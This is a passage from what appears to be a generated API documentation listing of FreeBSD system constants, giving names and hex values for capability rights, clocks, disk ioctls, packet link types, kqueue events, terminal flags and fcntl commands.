CAP_FEXECVE = 0x200000000000080 constant CAP_FLOCK (line 269) | CAP_FLOCK = 0x200000000010000 constant CAP_FPATHCONF (line 270) | CAP_FPATHCONF = 0x200000000020000 constant CAP_FSCK (line 271) | CAP_FSCK = 0x200000000040000 constant CAP_FSTAT (line 272) | CAP_FSTAT = 0x200000000080000 constant CAP_FSTATAT (line 273) | CAP_FSTATAT = 0x200000000080400 constant CAP_FSTATFS (line 274) | CAP_FSTATFS = 0x200000000100000 constant CAP_FSYNC (line 275) | CAP_FSYNC = 0x200000000000100 constant CAP_FTRUNCATE (line 276) | CAP_FTRUNCATE = 0x200000000000200 constant CAP_FUTIMES (line 277) | CAP_FUTIMES = 0x200000000200000 constant CAP_FUTIMESAT (line 278) | CAP_FUTIMESAT = 0x200000000200400 constant CAP_GETPEERNAME (line 279) | CAP_GETPEERNAME = 0x200000100000000 constant CAP_GETSOCKNAME (line 280) | CAP_GETSOCKNAME = 0x200000200000000 constant CAP_GETSOCKOPT (line 281) | CAP_GETSOCKOPT = 0x200000400000000 constant CAP_IOCTL (line 282) | CAP_IOCTL = 0x400000000000080 constant CAP_IOCTLS_ALL (line 283) | CAP_IOCTLS_ALL = 0x7fffffffffffffff constant CAP_KQUEUE (line 284) | CAP_KQUEUE = 0x400000000100040 constant CAP_KQUEUE_CHANGE (line 285) | CAP_KQUEUE_CHANGE = 0x400000000100000 constant CAP_KQUEUE_EVENT (line 286) | CAP_KQUEUE_EVENT = 0x400000000000040 constant CAP_LINKAT_SOURCE (line 287) | CAP_LINKAT_SOURCE = 0x200020000000400 constant CAP_LINKAT_TARGET (line 288) | CAP_LINKAT_TARGET = 0x200000000400400 constant CAP_LISTEN (line 289) | CAP_LISTEN = 0x200000800000000 constant CAP_LOOKUP (line 290) | CAP_LOOKUP = 0x200000000000400 constant CAP_MAC_GET (line 291) | CAP_MAC_GET = 0x400000000000001 constant CAP_MAC_SET (line 292) | CAP_MAC_SET = 0x400000000000002 constant CAP_MKDIRAT (line 293) | CAP_MKDIRAT = 0x200000000800400 constant CAP_MKFIFOAT (line 294) | CAP_MKFIFOAT = 0x200000001000400 constant CAP_MKNODAT (line 295) | CAP_MKNODAT = 0x200000002000400 constant CAP_MMAP (line 296) | CAP_MMAP = 0x200000000000010 constant CAP_MMAP_R (line 297) | CAP_MMAP_R = 0x20000000000001d constant CAP_MMAP_RW (line 298) | CAP_MMAP_RW = 0x20000000000001f constant CAP_MMAP_RWX (line 299) | CAP_MMAP_RWX = 0x20000000000003f constant CAP_MMAP_RX (line 300) | CAP_MMAP_RX = 0x20000000000003d constant CAP_MMAP_W (line 301) | CAP_MMAP_W = 0x20000000000001e constant CAP_MMAP_WX (line 302) | CAP_MMAP_WX = 0x20000000000003e constant CAP_MMAP_X (line 303) | CAP_MMAP_X = 0x20000000000003c constant CAP_PDGETPID (line 304) | CAP_PDGETPID = 0x400000000000200 constant CAP_PDKILL (line 305) | CAP_PDKILL = 0x400000000000800 constant CAP_PDWAIT (line 306) | CAP_PDWAIT = 0x400000000000400 constant CAP_PEELOFF (line 307) | CAP_PEELOFF = 0x200001000000000 constant CAP_POLL_EVENT (line 308) | CAP_POLL_EVENT = 0x400000000000020 constant CAP_PREAD (line 309) | CAP_PREAD = 0x20000000000000d constant CAP_PWRITE (line 310) | CAP_PWRITE = 0x20000000000000e constant CAP_READ (line 311) | CAP_READ = 0x200000000000001 constant CAP_RECV (line 312) | CAP_RECV = 0x200000000000001 constant CAP_RENAMEAT_SOURCE (line 313) | CAP_RENAMEAT_SOURCE = 0x200000004000400 constant CAP_RENAMEAT_TARGET (line 314) | CAP_RENAMEAT_TARGET = 0x200040000000400 constant CAP_RIGHTS_VERSION (line 315) | CAP_RIGHTS_VERSION = 0x0 constant CAP_RIGHTS_VERSION_00 (line 316) | CAP_RIGHTS_VERSION_00 = 0x0 constant CAP_SEEK (line 317) | CAP_SEEK = 0x20000000000000c constant CAP_SEEK_TELL (line 318) | CAP_SEEK_TELL = 0x200000000000004 constant CAP_SEM_GETVALUE (line 319) | CAP_SEM_GETVALUE = 0x400000000000004 constant CAP_SEM_POST (line 320) | CAP_SEM_POST = 0x400000000000008 constant CAP_SEM_WAIT (line 321) | CAP_SEM_WAIT = 0x400000000000010 constant CAP_SEND (line 322) | CAP_SEND = 0x200000000000002 constant CAP_SETSOCKOPT (line 323) | CAP_SETSOCKOPT = 0x200002000000000 constant CAP_SHUTDOWN (line 324) | CAP_SHUTDOWN = 0x200004000000000 constant CAP_SOCK_CLIENT (line 325) | CAP_SOCK_CLIENT = 0x200007780000003 constant CAP_SOCK_SERVER (line 326) | CAP_SOCK_SERVER = 0x200007f60000003 constant CAP_SYMLINKAT (line 327) | CAP_SYMLINKAT = 0x200000008000400 constant CAP_TTYHOOK (line 328) | CAP_TTYHOOK = 0x400000000000100 constant CAP_UNLINKAT (line 329) | CAP_UNLINKAT = 0x200000010000400 constant CAP_UNUSED0_44 (line 330) | CAP_UNUSED0_44 = 0x200080000000000 constant CAP_UNUSED0_57 (line 331) | CAP_UNUSED0_57 = 0x300000000000000 constant CAP_UNUSED1_22 (line 332) | CAP_UNUSED1_22 = 0x400000000200000 constant CAP_UNUSED1_57 (line 333) | CAP_UNUSED1_57 = 0x500000000000000 constant CAP_WRITE (line 334) | CAP_WRITE = 0x200000000000002 constant CFLUSH (line 335) | CFLUSH = 0xf constant CLOCAL (line 336) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 337) | CLOCK_BOOTTIME = 0x5 constant CLOCK_MONOTONIC (line 338) | CLOCK_MONOTONIC = 0x4 constant CLOCK_MONOTONIC_COARSE (line 339) | CLOCK_MONOTONIC_COARSE = 0xc constant CLOCK_MONOTONIC_FAST (line 340) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 341) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 342) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 343) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 344) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_COARSE (line 345) | CLOCK_REALTIME_COARSE = 0xa constant CLOCK_REALTIME_FAST (line 346) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 347) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 348) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 349) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 350) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 351) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 352) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 353) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 354) | CPUSTATES = 0x5 constant CP_IDLE (line 355) | CP_IDLE = 0x4 constant CP_INTR (line 356) | CP_INTR = 0x3 constant CP_NICE (line 357) | CP_NICE = 0x1 constant CP_SYS (line 358) | CP_SYS = 0x2 constant CP_USER (line 359) | CP_USER = 0x0 constant CREAD (line 360) | CREAD = 0x800 constant CRTSCTS (line 361) | CRTSCTS = 0x30000 constant CS5 (line 362) | CS5 = 0x0 constant CS6 (line 363) | CS6 = 0x100 constant CS7 (line 364) | CS7 = 0x200 constant CS8 (line 365) | CS8 = 0x300 constant CSIZE (line 366) | CSIZE = 0x300 constant CSTART (line 367) | CSTART = 0x11 constant CSTATUS (line 368) | CSTATUS = 0x14 constant CSTOP (line 369) | CSTOP = 0x13 constant CSTOPB (line 370) | CSTOPB = 0x400 constant CSUSP (line 371) | CSUSP = 0x1a constant CTL_HW (line 372) | CTL_HW = 0x6 constant CTL_KERN (line 373) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 374) | CTL_MAXNAME = 0x18 constant CTL_NET (line 375) | CTL_NET = 0x4 constant DIOCGATTR (line 376) | DIOCGATTR = 0xc148648e constant DIOCGDELETE (line 377) | DIOCGDELETE = 0x80106488 constant DIOCGFLUSH (line 378) | DIOCGFLUSH = 0x20006487 constant DIOCGFWHEADS (line 379) | DIOCGFWHEADS = 0x40046483 constant DIOCGFWSECTORS (line 380) | DIOCGFWSECTORS = 0x40046482 constant DIOCGIDENT (line 381) | DIOCGIDENT = 0x41006489 constant DIOCGKERNELDUMP (line 382) | DIOCGKERNELDUMP = 0xc0986492 constant DIOCGMEDIASIZE (line 383) | DIOCGMEDIASIZE = 0x40086481 constant DIOCGPHYSPATH (line 384) | DIOCGPHYSPATH = 0x4400648d constant DIOCGPROVIDERNAME (line 385) | DIOCGPROVIDERNAME = 0x4400648a constant DIOCGSECTORSIZE (line 386) | DIOCGSECTORSIZE = 0x40046480 constant DIOCGSTRIPEOFFSET (line 387) | DIOCGSTRIPEOFFSET = 0x4008648c constant DIOCGSTRIPESIZE (line 388) | DIOCGSTRIPESIZE = 0x4008648b constant DIOCSKERNELDUMP (line 389) | DIOCSKERNELDUMP = 0x80986491 constant DIOCSKERNELDUMP_FREEBSD11 (line 390) | DIOCSKERNELDUMP_FREEBSD11 = 0x80046485 constant DIOCSKERNELDUMP_FREEBSD12 (line 391) | DIOCSKERNELDUMP_FREEBSD12 = 0x80506490 constant DIOCZONECMD (line 392) | DIOCZONECMD = 0xc080648f constant DLT_A429 (line 393) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 394) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 395) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 396) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 397) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 398) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 399) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 400) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 401) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 402) | DLT_AURORA = 0x7e constant DLT_AX25 (line 403) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 404) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 405) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 406) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 407) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 408) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 409) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 410) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 411) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 412) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 413) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 414) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 415) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 416) | DLT_CISCO_IOS = 0x76 constant DLT_CLASS_NETBSD_RAWAF (line 417) | DLT_CLASS_NETBSD_RAWAF = 0x2240000 constant DLT_C_HDLC (line 418) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 419) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 420) | DLT_DBUS = 0xe7 constant DLT_DECT (line 421) | DLT_DECT = 0xdd constant DLT_DISPLAYPORT_AUX (line 422) | DLT_DISPLAYPORT_AUX = 0x113 constant DLT_DOCSIS (line 423) | DLT_DOCSIS = 0x8f constant DLT_DOCSIS31_XRA31 (line 424) | DLT_DOCSIS31_XRA31 = 0x111 constant DLT_DVB_CI (line 425) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 426) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 427) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 428) | DLT_EN3MB = 0x2 constant DLT_ENC (line 429) | DLT_ENC = 0x6d constant DLT_EPON (line 430) | DLT_EPON = 0x103 constant DLT_ERF (line 431) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 432) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 433) | DLT_ERF_POS = 0xb0 constant DLT_ETHERNET_MPACKET (line 434) | DLT_ETHERNET_MPACKET = 0x112 constant DLT_FC_2 (line 435) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 436) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 437) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 438) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 439) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 440) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 441) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 442) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 443) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 444) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 445) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 446) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 447) | DLT_GSMTAP_UM = 0xd9 constant DLT_IBM_SN (line 448) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 449) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 450) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 451) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 452) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 453) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 454) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 455) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 456) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 457) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 458) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 459) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 460) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 461) | DLT_IPFILTER = 0x74 constant DLT_IPMB_KONTRON (line 462) | DLT_IPMB_KONTRON = 0xc7 constant DLT_IPMB_LINUX (line 463) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 464) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 465) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 466) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 467) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 468) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 469) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 470) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 471) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 472) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 473) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 474) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 475) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 476) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 477) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 478) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 479) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 480) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 481) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 482) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 483) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 484) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 485) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 486) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 487) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 488) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 489) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 490) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 491) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 492) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 493) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 494) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 495) | DLT_LAPD = 0xcb constant DLT_LIN (line 496) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 497) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 498) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 499) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 500) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 501) | DLT_LINUX_SLL = 0x71 constant DLT_LINUX_SLL2 (line 502) | DLT_LINUX_SLL2 = 0x114 constant DLT_LOOP (line 503) | DLT_LOOP = 0x6c constant DLT_LORATAP (line 504) | DLT_LORATAP = 0x10e constant DLT_LTALK (line 505) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 506) | DLT_MATCHING_MAX = 0x114 constant DLT_MATCHING_MIN (line 507) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 508) | DLT_MFR = 0xb6 constant DLT_MOST (line 509) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 510) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 511) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 512) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 513) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 514) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 515) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 516) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 517) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 518) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 519) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 520) | DLT_NFLOG = 0xef constant DLT_NG40 (line 521) | DLT_NG40 = 0xf4 constant DLT_NORDIC_BLE (line 522) | DLT_NORDIC_BLE = 0x110 constant DLT_NULL (line 523) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 524) | DLT_OPENFLOW = 0x10b constant DLT_PCI_EXP (line 525) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 526) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 527) | DLT_PFSYNC = 0x79 constant DLT_PKTAP (line 528) | DLT_PKTAP = 0x102 constant DLT_PPI (line 529) | DLT_PPI = 0xc0 constant DLT_PPP (line 530) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 531) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 532) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 533) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 534) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 535) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 536) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 537) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 538) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 539) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 540) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 541) | DLT_RAW = 0xc constant DLT_RDS (line 542) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 543) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 544) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 545) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 546) | DLT_SCCP = 0x8e constant DLT_SCTP (line 547) | DLT_SCTP = 0xf8 constant DLT_SDLC (line 548) | DLT_SDLC = 0x10c constant DLT_SITA (line 549) | DLT_SITA = 0xc4 constant DLT_SLIP (line 550) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 551) | DLT_SLIP_BSDOS = 0xd constant DLT_STANAG_5066_D_PDU (line 552) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 553) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 554) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TI_LLN_SNIFFER (line 555) | DLT_TI_LLN_SNIFFER = 0x10d constant DLT_TZSP (line 556) | DLT_TZSP = 0x80 constant DLT_USB (line 557) | DLT_USB = 0xba constant DLT_USBPCAP (line 558) | DLT_USBPCAP = 0xf9 constant DLT_USB_DARWIN (line 559) | DLT_USB_DARWIN = 0x10a constant DLT_USB_FREEBSD (line 560) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 561) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 562) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 563) | DLT_USER0 = 0x93 constant DLT_USER1 (line 564) | DLT_USER1 = 0x94 constant DLT_USER10 (line 565) | DLT_USER10 = 0x9d constant DLT_USER11 (line 566) | DLT_USER11 = 0x9e constant DLT_USER12 (line 567) | DLT_USER12 = 0x9f constant DLT_USER13 (line 568) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 569) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 570) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 571) | DLT_USER2 = 0x95 constant DLT_USER3 (line 572) | DLT_USER3 = 0x96 constant DLT_USER4 (line 573) | DLT_USER4 = 0x97 constant DLT_USER5 (line 574) | DLT_USER5 = 0x98 constant DLT_USER6 (line 575) | DLT_USER6 = 0x99 constant DLT_USER7 (line 576) | DLT_USER7 = 0x9a constant DLT_USER8 (line 577) | DLT_USER8 = 0x9b constant DLT_USER9 (line 578) | DLT_USER9 = 0x9c constant DLT_VSOCK (line 579) | DLT_VSOCK = 0x10f constant DLT_WATTSTOPPER_DLM (line 580) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 581) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 582) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 583) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 584) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 585) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 586) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 587) | DT_BLK = 0x6 constant DT_CHR (line 588) | DT_CHR = 0x2 constant DT_DIR (line 589) | DT_DIR = 0x4 constant DT_FIFO (line 590) | DT_FIFO = 0x1 constant DT_LNK (line 591) | DT_LNK = 0xa constant DT_REG (line 592) | DT_REG = 0x8 constant DT_SOCK (line 593) | DT_SOCK = 0xc constant DT_UNKNOWN (line 594) | DT_UNKNOWN = 0x0 constant DT_WHT (line 595) | DT_WHT = 0xe constant ECHO (line 596) | ECHO = 0x8 constant ECHOCTL (line 597) | ECHOCTL = 0x40 constant ECHOE (line 598) | ECHOE = 0x2 constant ECHOK (line 599) | ECHOK = 0x4 constant ECHOKE (line 600) | ECHOKE = 0x1 constant ECHONL (line 601) | ECHONL = 0x10 constant ECHOPRT (line 602) | ECHOPRT = 0x20 constant EHE_DEAD_PRIORITY (line 603) | EHE_DEAD_PRIORITY = -0x1 constant EVFILT_AIO (line 604) | EVFILT_AIO = -0x3 constant EVFILT_EMPTY (line 605) | EVFILT_EMPTY = -0xd constant EVFILT_FS (line 606) | EVFILT_FS = -0x9 constant EVFILT_LIO (line 607) | EVFILT_LIO = -0xa constant EVFILT_PROC (line 608) | EVFILT_PROC = -0x5 constant EVFILT_PROCDESC (line 609) | EVFILT_PROCDESC = -0x8 constant EVFILT_READ (line 610) | EVFILT_READ = -0x1 constant EVFILT_SENDFILE (line 611) | EVFILT_SENDFILE = -0xc constant EVFILT_SIGNAL (line 612) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 613) | EVFILT_SYSCOUNT = 0xd constant EVFILT_TIMER (line 614) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 615) | EVFILT_USER = -0xb constant EVFILT_VNODE (line 616) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 617) | EVFILT_WRITE = -0x2 constant EVNAMEMAP_NAME_SIZE (line 618) | EVNAMEMAP_NAME_SIZE = 0x40 constant EV_ADD (line 619) | EV_ADD = 0x1 constant EV_CLEAR (line 620) | EV_CLEAR = 0x20 constant EV_DELETE (line 621) | EV_DELETE = 0x2 constant EV_DISABLE (line 622) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 623) | EV_DISPATCH = 0x80 constant EV_DROP (line 624) | EV_DROP = 0x1000 constant EV_ENABLE (line 625) | EV_ENABLE = 0x4 constant EV_EOF (line 626) | EV_EOF = 0x8000 constant EV_ERROR (line 627) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 628) | EV_FLAG1 = 0x2000 constant EV_FLAG2 (line 629) | EV_FLAG2 = 0x4000 constant EV_FORCEONESHOT (line 630) | EV_FORCEONESHOT = 0x100 constant EV_ONESHOT (line 631) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 632) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 633) | EV_SYSFLAGS = 0xf000 constant EXTA (line 634) | EXTA = 0x4b00 constant EXTATTR_MAXNAMELEN (line 635) | EXTATTR_MAXNAMELEN = 0xff constant EXTATTR_NAMESPACE_EMPTY (line 636) | EXTATTR_NAMESPACE_EMPTY = 0x0 constant EXTATTR_NAMESPACE_SYSTEM (line 637) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 638) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 639) | EXTB = 0x9600 constant EXTPROC (line 640) | EXTPROC = 0x800 constant FD_CLOEXEC (line 641) | FD_CLOEXEC = 0x1 constant FD_NONE (line 642) | FD_NONE = -0xc8 constant FD_SETSIZE (line 643) | FD_SETSIZE = 0x400 constant FLUSHO (line 644) | FLUSHO = 0x800000 constant F_ADD_SEALS (line 645) | F_ADD_SEALS = 0x13 constant F_CANCEL (line 646) | F_CANCEL = 0x5 constant F_DUP2FD (line 647) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 648) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 649) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 650) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 651) | F_GETFD = 0x1 constant F_GETFL (line 652) | F_GETFL = 0x3 constant F_GETLK (line 653) | F_GETLK = 0xb constant F_GETOWN (line 654) | F_GETOWN = 0x5 constant F_GET_SEALS (line 655) | F_GET_SEALS = 0x14 constant F_ISUNIONSTACK (line 656) | F_ISUNIONSTACK = 0x15 constant F_KINFO (line 657) | F_KINFO = 0x16 constant F_OGETLK (line 658) | F_OGETLK = 0x7 constant F_OK (line 659) | F_OK = 0x0 constant F_OSETLK (line 660) | F_OSETLK = 0x8 constant F_OSETLKW (line 661) | F_OSETLKW = 0x9 constant F_RDAHEAD (line 662) | F_RDAHEAD = 0x10 constant F_RDLCK (line 663) | F_RDLCK = 0x1 constant F_READAHEAD (line 664) | F_READAHEAD = 0xf constant F_SEAL_GROW (line 665) | F_SEAL_GROW = 0x4 constant F_SEAL_SEAL (line 666) | F_SEAL_SEAL = 0x1 constant F_SEAL_SHRINK (line 667) | F_SEAL_SHRINK = 0x2 constant F_SEAL_WRITE (line 668) | F_SEAL_WRITE = 0x8 constant F_SETFD (line 669) | F_SETFD = 0x2 constant F_SETFL (line 670) | F_SETFL = 0x4 constant F_SETLK (line 671) | F_SETLK = 0xc constant F_SETLKW (line 672) | 